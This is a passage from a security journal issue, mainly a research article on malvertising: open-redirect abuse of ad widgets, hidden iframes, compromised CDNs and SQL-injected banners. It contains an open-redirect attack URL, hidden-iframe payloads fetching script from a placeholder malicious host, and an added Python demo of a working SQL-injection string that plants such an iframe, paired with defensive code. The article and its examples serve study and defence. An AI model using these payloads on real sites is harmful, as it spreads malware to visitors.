Malvertising - Exploiting Web Advertising | Elsevier Computer Fraud and Security Journal



which he describes as “a bit basic”, will make in and of themselves. While he says that the “unification of views” from disparate industry bodies can only be a good thing, he points out that their value to the industry is likely to remain limited “until and unless businesses [rather than individual practitioners] are made fully aware of their existence and accept and embrace them”. “It’s a good starting point if only for debate such as this,” he says, “but it will be interesting to see the status of the principles in a year’s time.”

Ethics project

Meanwhile, another potential step on the road to professionalisation is the creation of an initiative entitled the Information Security Ethics Project, which is sponsored by and housed within the UK’s Institute of Information Security Professionals (IISP). The idea behind the project came from the Institute’s general counsel, Robert Carolina, who is also a senior visiting fellow at Royal Holloway University’s information security group, where he teaches in its information security MSc programme.

In early 2009, Carolina wrote an article for Computer Weekly about the legality – or otherwise – of the actions of the BBC’s Click TV programme team when it created its own botnet for educational purposes by commandeering more than 21,000 computers around the world. Carolina canvassed the opinions of a number of information security practitioners as to whether they considered the move right or wrong. The responses, which ranged from “it’s absolutely appalling and law enforcement should throw the book at them” to “they deserve to get an award” – which, incidentally, they later did – prompted him to explore what ethical guidance was currently available, most of which he found unhelpful.

As a result, as of early February this year, Carolina kicked off the first in a series of ethics workshops, made up of no more than 25 IISP members. “This is an area where people are crying out for guidance, especially in the private sector,” he says. “We want practitioners to have better information so that they feel less exposed and better informed to make hard decisions.”

Things are changing

The half-day discussion centred on a series of hypothetical case studies that were used to debate the right and wrong ways to respond in each scenario and, most importantly, why. The aim was to look for points of commonality and difference in individuals’ beliefs and approaches and to use those areas where opinion diverged as the basis for further discussion. The next step will be to host an ongoing series of workshops over the next 12 months or so and to circulate reports based on the outcomes to members of the working group, although other individuals will be invited to join as appropriate.

“If this gains traction and popular support, we might be able to start abstracting out basic principles to describe what ethical practices are and maybe write them down as a rule set,” Carolina says. “But if we do that, it will only be published with highlighted case studies as you have to have examples and context. In my professional opinion, without that, it’s not much value.”

While such initiatives are, unfortunately, still rather fragmented in nature, what they would appear to suggest is that the information security industry is slowly starting to move down the path of becoming more professionalised. As Gillespie concludes: “Things are changing. There are lots of pockets of work being done and, while they’re not consistent or global, you can see a day when the industry will get there – although it’s a long road yet.”

About the author

Cath Everett is a freelance journalist who has been writing about business and technology issues since 1992. Her special areas of focus include information security, HR/management and skills issues, marketing and high-end software.
Malvertising – exploiting web advertising

Aditya K Sood, Richard J Enbody, Michigan State University

Computer Fraud & Security, April 2011

Online advertisements provide a convenient platform for spreading malware. Since ads provide a significant portion of revenue on the web, significant effort is put into attracting users to them. Malicious agents take advantage of this skillful attraction and then redirect users to malicious sites that serve malware.

Search engines’ intimate tie-in with advertising also assists malicious agents: significant effort goes into attracting users to particular sites from which users can be redirected. Of particular use to malicious agents is that redirection is built into online advertising, so the malicious user only needs to co-opt a redirection that is taking place. As a bonus, the user expects a redirection to take place, so the redirection to a malicious site is less of a red flag.
Another feature of online advertising that can be co-opted by malicious agents is the dynamic delivery of ads. A standard approach is to provide HTML code snippets that are used in conjunction with normal websites in order to embed advertisements. For example, Doubleclick.net provides millions of ads that are served to different domains as dynamic content – that is, the content of advertisements can change dynamically based on user or content characteristics. Service Level Agreements (SLAs) exist between ad distributor and website to define appropriate content, but they are neither designed for nor appropriate for applying effective security. In particular, it is hard to determine the integrity of content that is shared among different domains across the web.

The result is that online marketing has opened up new avenues for profit generation while at the same time providing a convenient platform for malware delivery. Malvertising growth is being assisted by the following:

• Malicious agents can register nearly any domain and use it as a storage base for malware in order to conduct drive-by-download attacks by redirecting users to their malicious domains.1 Generally, these types of domains do not comply with any security or privacy standards.
• Malicious agents can use different modes of malvertising infection in order to redirect traffic from malvertisements that are distributed across the World Wide Web. When a user clicks on a malvertisement, the traffic is redirected towards a malicious domain rather than the legitimate one.
• Generally, no verification check can be imposed on advertisements to detect whether the redirect occurs appropriately or not. This lack of verification results from the nature of the web-advertising model, which makes it difficult for a publisher to scrutinise web traffic related to ad delivery.
• Attackers can also tamper with sponsored links to distribute malicious executables directly onto the system as part of a drive-by-download infection. Internet Explorer has been a popular target because of both its popularity and its ability to run custom exploits through ActiveX controls [8].

The irony is that advertisers pay the publishers for the advertisements while the attackers exploit those same ads to spread malware.

Malvertising modes

Most web malware is triggered through web injections that exploit vulnerabilities in web software and domains. Different modes of infection are used for injecting malicious advertisements into vulnerable domains. To appreciate the severity and prevalence of this class of attack, note that the Open Web Application Security Project (OWASP) recently placed unvalidated redirects and forwards in its 2010 ‘top 10’ list.2

Malvertising with malicious widgets and redirection

The advent of Web 2.0 popularised widgets for use in advertising and traffic redirection.3 However, flaws in the design of some web widgets pose high risks to domains using those widgets for advertising.4 As mentioned above, the redirection can be co-opted by malicious users to redirect traffic to malicious sites.

Figure 1: Registering a widget on a vulnerable advertising domain.
For example, we detected a widget vulnerability in a popular news publisher website. The normal procedure is for a user to register, which allows the publisher to render news from various popular channels and embed them into the user’s websites and blogs. However, because of flaws in the publisher’s system, it’s possible to redirect traffic.

In order to install the widget, the publishing domain requires certain steps to be performed by a user to facilitate the ability of the widget to include third-party content. Specifically:

• The widget can only be installed after registration. The user selects the widget code based on the target platform – such as Blogger, MySpace etc – in which the widget is to be installed.
• Once the registration is complete, the publisher requires the user to log in to his or her website or blog so that widget installation can be completed. After installation, the publisher starts sending news and advertisements to the registered user’s website.
• After the widget is embedded in the user’s site, the user is able to receive random content from various content providers through a vulnerable advertising domain that acts as an intermediate service provider.

For advertising purposes, the vulnerable publishing domain uses redirection links in order to advertise on the publisher’s website. However, web traffic can be easily redirected from where the widget is installed to any domain. This shows that inclusion of the widget in any random domain can result in traffic redirection from a vulnerable publisher’s website through advertising links. The attacker can exploit this scenario by performing three steps:

Step 1: The attacker registers as a legitimate user (in order to get a widget for inclusion in some domain) as shown in Figure 1. The widget is included in the same domain as shown in Figure 2.

Step 2: The attacker can activate the apparently dead vulnerability through hyperlinks by activating the URL from the vulnerable publishing domain as follows, where ‘outbrain.com’ is a vulnerable advertising domain and ‘xsstestingblog’ is a blog that serves malware:

http://outbrain.com/most-viewed.action?sourceUrl=http://www.xsstestingblog.blogspot.com

Step 3: Users who go to the widget thinking that they are entering the publisher’s site find themselves redirected to the attacker’s site. A successful attack can be seen as a request/response exchange in Figure 3.

This attack is the outcome of a design bug in the widget implementation: the sourceUrl parameter is an unvalidated redirect, so the redirect target is whatever the attacker places in the link. Attackers can exploit this scenario by generating malicious advertisements (using the publisher’s name) that are embedded with redirecting URLs which exploit the design bug in the vulnerable publishing domain in order to execute redirection towards the malicious domain. This shows how a vulnerable advertising widget can be subverted by an attacker.

Figure 2: Installed widget.
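The handler behind the Step 2 URL is an unvalidated redirect. As an added example (not code from the article, and not the publisher’s code), here is a constructed Python model of such a handler in its vulnerable form beside a hardened one. PUBLISHER_HOME, ALLOWED_REDIRECT_HOSTS and the function names are this example’s assumptions; outbrain.com appears only because the text names it as the advertising domain the widget legitimately bounces through.

```python
from urllib.parse import parse_qs, urlsplit, urlunsplit

# Constructed model of a publisher-side redirect handler behind a URL such as
#   /most-viewed.action?sourceUrl=...
# PUBLISHER_HOME, the allow-list and the function names are assumptions of this
# example; they describe no real publisher's implementation.
PUBLISHER_HOME = "https://www.publisher.example/"
# Assumed: the ad partner the widget is legitimately allowed to bounce through.
ALLOWED_REDIRECT_HOSTS = frozenset({"outbrain.com"})


def redirect_target_vulnerable(query_string: str) -> str:
    """The design bug as described: whatever sourceUrl says becomes the Location header."""
    return parse_qs(query_string).get("sourceUrl", [PUBLISHER_HOME])[0]


def redirect_target_hardened(query_string: str, allowed=ALLOWED_REDIRECT_HOSTS) -> str:
    """Follow sourceUrl only if it is an absolute http(s) URL whose host is an allowed
    domain or a subdomain of one; otherwise fall back to the publisher's own page."""
    candidate = parse_qs(query_string).get("sourceUrl", [""])[0]
    try:
        parts = urlsplit(candidate)
        host = (parts.hostname or "").lower()  # hostname drops any user:pass@ prefix
        port = parts.port                        # raises ValueError on a malformed port
    except ValueError:
        return PUBLISHER_HOME
    if parts.scheme not in ("http", "https") or not host:
        return PUBLISHER_HOME                    # blocks javascript:, data: and //host forms
    # Exact match or dotted-suffix match; a bare endswith() would accept
    # outbrain.com.evil.example.
    if not any(host == a or host.endswith("." + a) for a in allowed):
        return PUBLISHER_HOME
    netloc = host if port is None else f"{host}:{port}"
    # Rebuild from the parsed parts so userinfo and fragments never reach the Location header.
    return urlunsplit((parts.scheme, netloc, parts.path or "/", parts.query, ""))


if __name__ == "__main__":
    attack = "sourceUrl=http://www.xsstestingblog.blogspot.com"
    print("vulnerable:", redirect_target_vulnerable(attack))
    print("hardened:  ", redirect_target_hardened(attack))
```

The hardened version rejects the blog URL from Step 2 while still allowing the ad partner, and it handles the usual allow-list bypasses: a scheme-relative //host, a javascript: URL, userinfo tricks such as http://outbrain.com@evil.example, and look-alike suffixes such as outbrain.com.evil.example. Where the business need permits, the safer design is to drop the free-form sourceUrl altogether and redirect by an opaque identifier that is looked up server-side.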
Malvertising through hidden iframes

Hidden iframes are one way for attackers to hide the objects that are used for spreading malware. The concept of hidden infection is not new, but here we show a different variation. The HTML specification includes the iframe element to embed one web page into another. Iframes can be used to load dynamic content for advertising, and this functionality can be exploited to trigger infections. Iframes are used extensively to pull content across origins: the Same Origin Policy (SOP) stops the framed script from reading the parent page, but it does not stop that script from running in the victim’s browser with the full browser and plug-in attack surface, which is all a Cross Domain Attack (CDA) needs.5,6 Attackers can easily embed hidden iframes that serve malvertisements in order to spread malware while interacting with legitimate users.

Usually, iframes are exploited using the following properties for running malicious code:

1. Scripts in iframes are allowed to execute in the context of the browser process (the more powerful the context, the greater the vulnerability that can be exploited).
2. There is no specific security restriction on ActiveX object usage.
3. Browser redirection can be done easily through iframes.
4. Access to local objects is not restricted completely.

The hidden iframes used for malvertising are constructed as follows:

<iframe src="http://www.malicious.com/mal_ad.js" width=1 height=1 style="visibility:hidden;position:absolute"></iframe>

<iframe src="http://www.malicious.com/software_ad.js" width=0 height=0></iframe>
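A publisher or hosting provider can catch the two constructions above in its own pages before a visitor does. The following is an added Python example, not code from the article: a static scanner that parses an HTML document, lists every iframe that is hidden by size or by style, and notes whether its src is cross-origin. The sample page, the malicious.example hostnames and the publisher.example origin are constructed for this example.

```python
from html.parser import HTMLParser
from urllib.parse import urlsplit

# Constructed sample page (not a real publisher's page): one normal ad slot, the two
# hidden constructions shown above, and a same-origin frame hidden with display:none.
SAMPLE_PAGE = """<html><body>
<h1>Top stories</h1>
<iframe src="https://ads.publisher.example/slot1" width=468 height=60></iframe>
<iframe src="http://www.malicious.example/mal_ad.js" width=1 height=1 style="visibility:hidden;position:absolute"></iframe>
<iframe src="http://www.malicious.example/software_ad.js" width=0 height=0></iframe>
<iframe src="/embed/player" width="640px" height="360px" style="display:none"></iframe>
</body></html>"""


class IframeCollector(HTMLParser):
    """Records the attributes of every <iframe> start tag (names are lower-cased by the parser)."""

    def __init__(self):
        super().__init__()
        self.iframes = []

    def handle_starttag(self, tag, attrs):
        if tag == "iframe":
            self.iframes.append({name: (value or "") for name, value in attrs})


def _is_tiny(dimension: str) -> bool:
    """True for width/height values of 0 or 1, with or without a px suffix."""
    value = dimension.strip().lower()
    if value.endswith("px"):
        value = value[:-2].strip()
    return value in ("0", "1")


def _style_hides(style: str) -> bool:
    """True if the inline style makes the frame invisible."""
    compact = style.replace(" ", "").lower()
    return "visibility:hidden" in compact or "display:none" in compact


def find_hidden_iframes(html: str, page_url: str) -> list:
    """Return one finding per iframe that is hidden by size, hidden by style, or carries
    a javascript: source. Each finding lists the reasons and whether src is cross-origin
    relative to page_url, so third-party frames can be triaged first."""
    collector = IframeCollector()
    collector.feed(html)
    page_host = (urlsplit(page_url).hostname or "").lower()
    findings = []
    for attrs in collector.iframes:
        src = attrs.get("src", "")
        reasons = []
        if _is_tiny(attrs.get("width", "")) or _is_tiny(attrs.get("height", "")):
            reasons.append("tiny")
        if _style_hides(attrs.get("style", "")):
            reasons.append("hidden-style")
        if src.strip().lower().startswith("javascript:"):
            reasons.append("javascript-src")
        if not reasons:
            continue
        src_host = (urlsplit(src).hostname or "").lower()
        findings.append({
            "src": src,
            "reasons": reasons,
            # A relative src has no host and stays same-origin; anything else is
            # compared against the page's own host.
            "cross_origin": bool(src_host) and src_host != page_host,
        })
    return findings


if __name__ == "__main__":
    for finding in find_hidden_iframes(SAMPLE_PAGE, "https://www.publisher.example/news"):
        print(finding)
```

Caveat: this is a static check over the HTML as served. An iframe written by obfuscated JavaScript (document.write, or createElement after load) exists only in the live DOM, so a monitoring system should feed the scanner a DOM snapshot taken by a headless browser rather than the raw response; the routine itself then applies unchanged.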
In addition, attackers can hide their malicious purpose using JavaScript obfuscation techniques to encode the malicious links. Iframes carry an inherited design flaw: they define a trust relationship between different domains that are communicating with each other, and that trust cannot be verified every time content is shared between domains.

This inability to precisely determine trust is why it is very hard to restrict the content present in iframes, and why framed content runs in the victim’s browser alongside the parent website. Attackers load malvertisements in iframes to run inside the parent page for inline infections, so that the detection process becomes harder.

Malvertising through infected Content Delivery Networks

In the advertising context, a Content Delivery Network (CDN) is a third-party server that provides ad content to different domains across the web. CDNs are the preferred choice for attackers to spread malware by exploiting the CDN web servers – the attackers can simply let the servers assist in spreading the malware. Advertisements use Flash, Silverlight, pop-ups, Windows Media Player files and JavaScript extensively. This is a grave concern because if a CDN server is exploited, the attacker can inject malicious code in the form of malvertisements and that code is widely distributed. There is a chain reaction: if a parent server is infected, the child nodes will automatically get infected, too. Corrupting a server that serves thousands of sites spreads the malvertisements broadly and, because the content arrives from a trusted source, often without suspicion.

We have identified Windows Media Player files being used in malvertising for spreading malware. An attacker can perform the following steps in order to design and inject malicious .wmv files as malvertisements:

Step 1: The attacker ‘backdoors’ the .wmv file using Windows Script Editor, with malicious code (as presented in Figure 4) that executes through Cross Site Scripting (XSS) attacks.

Step 2: The attacker injects this .wmv file in an iframe and injects the code in a vulnerable CDN domain. When this file is distributed across domains, it starts spreading the malicious XSS file and bypasses the Internet Explorer XSS filter as shown in Figure 5.

As you can see, CDNs have the potential to be a big problem with respect to web malware.

Figure 3: Victim browser successfully gets redirected to the malware domain.

Figure 4: Designing a .wmv file backdoor.

Malvertising through malicious banners

Advertising banners are used extensively in order to spread infections.7 Primarily, attackers exploit servers that host a number of websites on a single server – a common scenario. As above, attacking servers is an easy way to infect a large number of websites. In addition, since advertising banners are widespread, an attack through them will also be widespread. In this attack, the attackers exploit an XSS flaw or SQL injection vulnerability in websites hosted on the server in order to take full control. The attacker then uses two specific techniques to infect websites with malicious banners as follows:
• Attackers update the database with malicious iframes by exploiting SQL injection in order to trigger persistent infections.
• Attackers compromise the shared hosting server and use automated scripts to render malicious code on the main web page of different hosts.

When a user visits a specific website, malicious banners are displayed along with dynamic content. Clicking on the banner infects the user, or simply displaying the banner can lead to infection.

This trick can be used in conjunction with SEO poisoning, in which an attacker coerces a search engine to visit malicious domains or hijacked websites that display malicious banners.

Figure 5: WMV file is spreading malicious VbScript file.
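The first technique, persistent injection of a hidden iframe through SQL injection, can be shown end to end with a constructed example (added here, not from the article): a banner-management function on a shared-hosting site builds its UPDATE by string concatenation, so the attacker’s ‘title’ rewrites the banner HTML that every later visitor receives. The schema, the function names and the malicious.example host are this example’s assumptions; sqlite3 is used so the whole thing runs in memory.

```python
import sqlite3

# Constructed, self-contained model of a hosted site whose banner slots live in a
# database. Table, column and function names are assumptions of this example and
# describe no real product.
MALICIOUS_IFRAME = ('<iframe src="http://www.malicious.example/mal_ad.js" '
                    'width=1 height=1 style="visibility:hidden;position:absolute"></iframe>')

# Payload for the injectable title field: closes the string literal, adds a second
# SET assignment that overwrites the rendered HTML, then comments out the rest of
# the statement (including its WHERE clause, so every banner row is rewritten).
INJECTION = "Spring sale', html = '" + MALICIOUS_IFRAME + "' -- "


def new_site_db() -> sqlite3.Connection:
    """One site with a single legitimate banner."""
    db = sqlite3.connect(":memory:")
    db.execute("CREATE TABLE banners (id INTEGER PRIMARY KEY, title TEXT, html TEXT)")
    db.execute("INSERT INTO banners (id, title, html) VALUES (?, ?, ?)",
               (1, "Spring sale",
                '<a href="/sale"><img src="/img/sale.png" width=468 height=60></a>'))
    db.commit()
    return db


def rename_banner_vulnerable(db: sqlite3.Connection, banner_id: int, title: str) -> None:
    """String-built UPDATE: a single quote in title lets the attacker add SET clauses."""
    db.execute("UPDATE banners SET title = '" + title + "' WHERE id = " + str(banner_id))
    db.commit()


def rename_banner_safe(db: sqlite3.Connection, banner_id: int, title: str) -> None:
    """Parameterised UPDATE: title is bound as data, so the payload is stored as a literal."""
    db.execute("UPDATE banners SET title = ? WHERE id = ?", (title, banner_id))
    db.commit()


def banner_html(db: sqlite3.Connection, banner_id: int) -> str:
    """What the page template renders into the banner slot for every visitor."""
    return db.execute("SELECT html FROM banners WHERE id = ?", (banner_id,)).fetchone()[0]


def banner_title(db: sqlite3.Connection, banner_id: int) -> str:
    return db.execute("SELECT title FROM banners WHERE id = ?", (banner_id,)).fetchone()[0]


def demo() -> dict:
    """Run the same payload through both code paths and return what visitors would get."""
    vulnerable_db = new_site_db()
    rename_banner_vulnerable(vulnerable_db, 1, INJECTION)
    safe_db = new_site_db()
    rename_banner_safe(safe_db, 1, INJECTION)
    return {
        "vulnerable_html": banner_html(vulnerable_db, 1),
        "safe_html": banner_html(safe_db, 1),
        "safe_title": banner_title(safe_db, 1),
    }


if __name__ == "__main__":
    for key, value in demo().items():
        print(f"{key}: {value}")
```

Against the vulnerable function the stored banner becomes the hidden iframe, and because the comment swallows the WHERE clause, one request rewrites every banner on the host, which is the ‘render malicious code on the main web page of different hosts’ effect described above. The parameterised function stores the payload as an ordinary title and leaves the HTML untouched.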
Solutions

• The design of web applications and widgets should be thoroughly verified before allowing their use in a production environment. The widget should be installed with appropriate access controls in order to avoid any rogue actions.
• The interface communication channel between an installed widget and a parent website should be monitored to catch traffic redirection. Generally, the main website should not allow redirection in an open manner: redirect targets should be restricted to a controlled set of destinations.
• Appropriate configuration should be used in shared hosting environments. The servers should be audited regularly in order to detect any vulnerable hosts.
• A live malware monitoring system should be used for dedicated and shared hosting servers in order to trace malware infections at inception.
• Systems should be updated with the latest software and patches.

Conclusion

We’ve covered the essential dynamics of malvertising and the attack strategies used to distribute malicious advertisements across domains. Malvertisements are becoming one of the main sources of web malware. One reason for their popularity is a dearth of appropriate security procedures for content sharing. For example, merely signing an SLA does not ensure security and integrity in a shared network. There is a pressing need for rigorous security policies and procedures to curb the risk of this type of infection. History indicates that it is impossible to get rid of malware infections completely, but continuous efforts can contribute towards enhancing the security of our networks.

About the authors

Aditya K Sood is a security researcher, consultant and PhD candidate at Michigan State University. He has worked in the security domain for Armorize, COSEINC and KPMG and founded SecNiche Security. He has been an active speaker at conferences such as RSA, Toorcon, Hacker Halted, TRISC, EuSecwest, XCON, OWASP AppSec and CERT-IN, and has written content for HITB Ezine, ISSA, ISACA, Elsevier, Hakin9 and Usenix Login.

Dr Richard Enbody is an Associate Professor in the Department of Computer Science and Engineering, Michigan State University. He joined the faculty in 1987 after earning his PhD in Computer Science from the University of Minnesota. His research interests are in computer security, computer architecture, web-based distance education and parallel processing. He has two patents pending on hardware buffer-overflow protection, which will prevent most computer worms and viruses. He recently co-authored a CS1 Python book, The Practice of Computing using Python.

Resources

• Polychronakis, Michalis; Mavrommatis, Panayiotis; Provos, Niels. ‘Ghost Turns Zombie: Exploring the Life Cycle of Web-based Malware’. Accessed Mar 2011. <http://www.usenix.org/event/leet08/tech/full_papers/polychronakis/polychronakis.pdf>.
• Provos, Niels; McNamee, Dean; Mavrommatis, Panayiotis; Wang, Ke; Modadugu, Nagendra. ‘The Ghost in the Browser: Analysis of Web-based Malware’. Accessed Mar 2011. <http://www.usenix.org/event/hotbots07/tech/full_papers/provos/provos.pdf>.
• Ford, Sean; Cova, Marco; Kruegel, Christopher; Vigna, Giovanni. ‘Analyzing and Detecting Malicious Flash Advertisements’. Accessed Mar 2011. <http://www.cs.ucsb.edu/~chris/research/doc/acsac09_flash.pdf>.
• ‘Some 1.3 million malicious ads served daily’. SC Magazine, 18 May 2010. Accessed Mar 2011. <http://www.scmagazineus.com/report-some-13-million-malicious-ads-served-daily/article/170414/>.
• ‘Pay Per Click’. Wikipedia. Accessed Mar 2011. <http://en.wikipedia.org/wiki/Pay_per_click>.
• ‘ActiveX Controls’. Microsoft. Accessed Mar 2011. <http://msdn.microsoft.com/en-us/library/aa751968%28v=vs.85%29.aspx>.
• Danchev, Dancho. ‘MSN Norway serving Flash exploits through malvertising’. ZDNet, 27 Aug 2008. Accessed Mar 2011. <http://www.zdnet.com/blog/security/msn-norway-serving-flash-exploits-through-malvertising/1815>.
• ‘SEO Poisoning Attacks Growing’. Security Focus, 12 Mar 2008. Accessed Mar 2011. <http://www.securityfocus.com/brief/701>.

References

1. Cova, M; Kruegel, C; Vigna, G. ‘Detection and Analysis of Drive-by-Download Attacks and Malicious JavaScript Code’. In Proceedings of the World Wide Web Conference, 2010.
2. ‘OWASP Top 10 Attack Vectors 2010’. Accessed Mar 2011. <http://www.owasp.org/index.php/Top_10_2010-Main>.
3. Nations, Daniel. ‘What’s the Difference Between a Widget and a Gadget?’. About.com Web Trends. Accessed Mar 2011. <http://webtrends.about.com/od/widgets/a/widget-gadget.htm>.
4. Sood, AK. ‘Open Redirect Wreck Off’. HITB EZine. Accessed Mar 2011. <http://magazine.hitb.org/issues/HITB-Ezine-Issue-004.pdf>.
5. ‘Same Origin Policy’. W3C. Accessed Mar 2011. <http://www.w3.org/Security/wiki/Same_Origin_Policy>.
6. ‘Client-Side Cross-Domain Security’. Microsoft. Accessed Mar 2011. <http://msdn.microsoft.com/en-us/library/cc709423%28v=vs.85%29.aspx>.
7. ‘Content Delivery and Distribution Services’. Web Caching. Accessed Mar 2011. <http://www.web-caching.com/cdns.html>.

The UK fraud landscape for financial services

Duncan Ash, SAS UK

Fraud in the financial services industry is a topic that constantly makes headlines, but is the situation really as dire as the media would have us believe? Well, according to the recent statistics from the National Fraud Authority (NFA), released 27 January 2011, fraud is costing the UK over £38bn a year. In particular, the financial services industry recorded the highest loss to fraudsters at £3.6bn. However, on a more positive note this actually represented a slight decrease on the 2010 Annual Fraud Indicator figure of £3.8bn due to improved fraud prevention methods involving plastic card fraud (£440m) and cheque fraud (£30m).

Reducing levels of card fraud in particular has been cited as a success story in the fight against fraudsters, with the latest figures from The UK Cards Association (6 October 2010) revealing that total fraud losses on UK cards fell to £186.8m between January and June 2010 – a 20% reduction compared with losses in the first half of 2009. This figure represented the lowest half-year total for 10 years, and the reduction was attributed to the success of a number of banking industry initiatives. For instance, the increasing roll-out of chip and PIN in the UK and abroad, a greater number of sign-ups to MasterCard SecureCode and Verified by Visa by cardholders and retailers, and the increasing use of fraud detection tools by banks and retailers have all contributed to the decline in losses.

A moving target

Unfortunately, criminals tend to be opportunistic and are always on the lookout for the next weak link in the system that can be exploited. According to Financial Fraud Action UK (12 January 2010), more than 50% of regular UK Internet users (41.4 million) are now banking online. This substantial growth in popularity of the online channel in recent years, both in terms of Internet shopping and online banking, has led to an increased number of attacks, in particular through phishing and financial malware. The NFA figures show that online banking has seen an increase of 14% (£60m) in fraud losses compared with the previous year. As such, the sector must continue to invest in anti-fraud systems and solutions to help stay one step ahead of the criminals.

However, because of the great variation between the security levels of online sites and the increased measures that merchants can take to protect themselves, there is a growing acceptance in the banking industry that not all fraud in the online channel can be conquered. Instead, the industry is positioning itself to pick and choose its battles, ensuring that damage can be limited and consumer confidence left intact.

Moreover, the latest Fraudscape report from CIFAS, the UK’s fraud prevention service, issued in March 2011, depicts the continuing migration of fraud to new sectors: fewer bank accounts and plastic cards were targeted by fraudsters (15% and 37% decreases respectively) only to be offset